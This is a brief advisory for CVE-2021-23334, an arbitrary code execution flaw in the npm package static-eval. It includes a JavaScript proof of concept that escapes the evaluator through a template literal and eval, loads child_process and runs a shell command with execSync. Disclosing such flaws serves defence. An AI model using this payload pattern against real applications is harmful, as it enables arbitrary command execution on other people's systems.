CVE-2021-23334
All versions of package static-eval are vulnerable to Arbitrary Code Execution using FunctionExpressions and TemplateLiterals.
PoC:
var evaluate = require(‘static-eval’);
var parse = require(‘esprima’).parse;
var src="(function (x) { return ${eval("console.log(global.process.mainModule.constructor._load(‘child_process’).execSync(‘ls’).toString())")} })()"
var ast = parse(src).body[0].expression;
evaluate(ast)
Source: CVE-2021-23334